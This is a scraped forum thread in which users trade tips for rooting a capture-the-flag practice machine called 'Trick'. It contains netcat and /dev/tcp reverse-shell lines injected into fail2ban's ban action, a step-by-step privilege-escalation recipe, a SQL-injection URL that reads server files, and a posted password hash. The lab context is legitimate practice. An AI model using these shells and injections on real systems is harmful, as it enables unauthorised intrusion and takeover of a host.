Posts: 4 Threads: 0 Joined: N/A June 20, 2022 at 12:11 PM 😎 Posts: 0 Threads: 0 Joined: N/A June 20, 2022 at 12:37 PM Thanks Posts: 26 Threads: 0 Joined: N/A June 20, 2022 at 12:59 PM (June 20, 2022, 05:54 AM)undeadly Wrote: (June 19, 2022, 07:11 PM)mimikatz Wrote: (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this: actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash also tried the bash revshell actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1 doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.
no, it's not recreated on service restart. there's seems to be another cron which recreates those files.
how i did this: delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root: Thanks Posts: 59 Threads: 0 Joined: N/A  (June 20, 2022, 06:40 AM)Himitsu Wrote: (June 20, 2022, 05:54 AM)undeadly Wrote: it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root: REDACTED
Please edit and remove asap the SSH key in your post. It's not longer allow to post any private key here. Previously that will be explained by @Internetdreams then please follow. just an easy box. please, don't be so over-fascinated.. Posts: 20 Threads: 0 Joined: N/A hey guys how did you get the second subdomain marketing one! Posts: 20 Threads: 0 Joined: N/A how did you got this idea of fuzzing just this part?? Posts: 1 Threads: 0 Joined: N/A got this blog: https://liquidrage.in/?p=1363
but requires a password! Posts: 20 Threads: 0 Joined: N/A try root's hash $6$lbBzS2rUUVRa6Erd$u2u317eVZBZgdCrT2HViYv.69vxazyKjAuVETHTpTpD42H0RDPQIbsCHwPdKqBQphI/FOmpEt3lgD9QBsu6nU1
it works, blogs will set its password to root's hash sue to policies! :) Posts: 104 Threads: 0 Joined: N/A (June 20, 2022, 02:02 PM)wienerpeter Wrote: hey guys how did you get the second subdomain marketing one! view-source:http://preprod-payroll.trick.htb/manage_employee.php?id=-1+union+select+1,2,load_file('/etc/nginx/sites-available/default'),4,5,6,7,8
Posts: 4 Threads: 0 Joined: N/A Hello,
Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine? Please can anyone help me.
michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf ``` rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'? ``` |